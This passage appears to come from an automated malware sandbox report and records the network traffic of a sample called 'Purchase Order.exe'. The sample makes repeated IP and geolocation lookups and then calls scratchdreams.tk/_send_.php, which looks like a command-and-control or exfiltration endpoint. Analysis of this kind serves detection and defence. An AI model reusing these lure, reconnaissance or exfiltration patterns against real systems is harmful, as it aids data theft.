                                                                                                          Date: Thu, 04 Apr 2024 14:34:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 5ad0b05b4e54005bad95d1581ba23600
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449748132.226.247.73807048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Apr 4, 2024 16:34:19.784717083 CEST151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Apr 4, 2024 16:34:20.012692928 CEST324INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 107
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 3b6c0db971f4d3016e991667fccbc095
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449736104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:11 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:11 UTC711INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:11 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 40
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2F5goglpXvtribm%2BkCzM6Ib9%2F9zwudvmojMXr%2BF4kwaQaSVORzWGeErFVC8T1sxuN3JHqVzNUeyaoa0W42keZbaXmFkzA5632y1y0IhOGtD%2BLPgCK%2FeHNPbVwwQ917Z%2BW0IjQ54B"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f2048eab99495a-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:11 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449737104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:12 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-04-04 14:34:12 UTC699INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:12 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 41
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QhlnncZbCGsxkdsfIPyDN90Ei7talzBvc1KYAlELfxlBcY30Vuq733TNVYTdh7JRZlvyC5NjFqOqIBHjaBYKJWR%2BUid1ggYCyh9BNbwHR9n0n0sPS6e0fpHAXJcnHtmclvMbzuUV"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f20493cc9d8dc7-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:12 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449739104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:14 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:14 UTC707INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:14 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 43
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwtUn%2FSdnv0UBGuDY3iRq9p%2Fwasum76Ao04OPQAyhRRVuhrGSabjuANY%2Bk6tyIfk%2FJwZ2Fks4kJpFu6Y3WhnJtg0YCHtUmJ82dudKqO%2FgDI8J1m3AVE2Rbkx04CbsydOVKavEV54"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204a088e38d97-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:14 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449741104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:15 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:15 UTC707INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:15 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 44
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OD7AOOVMvV6%2Blk6%2Fu9Vso7iwSwJR78KS%2FAc0%2F3wYmULWk4mkpMT9Bh9lNRZiMsUccfDJuzs8v6l40q1kYgNKklq6Sji8tuTEugNCztgYTTazqAWSl7xoQ%2FgPa1Vhf1zNueVipzLP"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204a7192212a7-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:15 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449743104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:16 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:16 UTC703INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:16 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 45
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pzN12KAsQfMiuNyHNOyUaMk%2BRumX%2B0FlvCXw3QyY6VQYqtzd0ejS9%2BqtW4E6PJpd9BiF60cefYSe6RqyL6vlA5j1TC5TUZvaWcsvJL6kjVc3XE0mgYYkE90jSc7DBjRvy3jENAK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204adaaec3360-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:16 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449745104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:17 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:17 UTC713INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:17 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 46
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Il06xB032J%2Bkz29ZryUYTsTRWvnR%2B8QPd6ZVJXWGq73CcU1%2BnqYIO%2BKHOayz5H1Zy%2FQVLjoPQQPnZIxaMRyKhyJs65kpBQXD%2BJ%2F0AnnF%2B0v5BPvO2UuZqpWZC5BMHAGVhi3ZY2tU"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204b4584167db-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:17 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449747104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:19 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-04-04 14:34:19 UTC705INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:19 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 48
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50%2Bol7BGGdHAWRZcAvpzTqGnG%2BmpwEfigTxkafi8y23QOmaEhND%2Bdo1mum8oKJK07WJskJ9atrxBhZXZwVqw3iniD%2FOv5EYCidvYEJGv2CHa3R0lfB8NbugNuQ5shbz6jsgzkbza"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204bf1e5531da-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:19 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449749104.21.67.1524437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:20 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:20 UTC705INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 04 Apr 2024 14:34:20 GMT
                                                                                                          Content-Type: application/xml
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          vary: Accept-Encoding
                                                                                                          Cache-Control: max-age=86400
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 49
                                                                                                          Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVinTRz1AaUHyNf4fzjumviiAZCQFlse5MX523t%2BN8JxbMNkiDKmZ%2Ff2tQFLGvMDrozZ9aRgc2hSHiroagLXUQVeEPzVvogbHIXdsd%2BSRGn0kIrnzb2ubamntdQwDCH5g2W2Z%2B0d"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204c888035c7b-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:20 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                                                          2024-04-04 14:34:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449750104.21.27.854437048C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-04-04 14:34:21 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                                                                          Host: scratchdreams.tk
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-04-04 14:34:53 UTC737INHTTP/1.1 522
                                                                                                          Date: Thu, 04 Apr 2024 14:34:53 GMT
                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                          Content-Length: 15
                                                                                                          Connection: close
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSBp5v8ljD4MSikuuL2FMkTB%2FOEC0DBpIIZXkmUGPBSnGh4Dacrji%2BfPjwiBPSfJX%2FLfCjhAmaSj9RpmqoHrk39xEA5xSzNvofWjYPDJ4hWuI2pU7dSv6CR79cxwq9%2BsmDP8"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          Referrer-Policy: same-origin
                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 86f204ceae597419-MIA
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-04-04 14:34:53 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                                          Data Ascii: error code: 522


                                                                                                          SMTP Packets

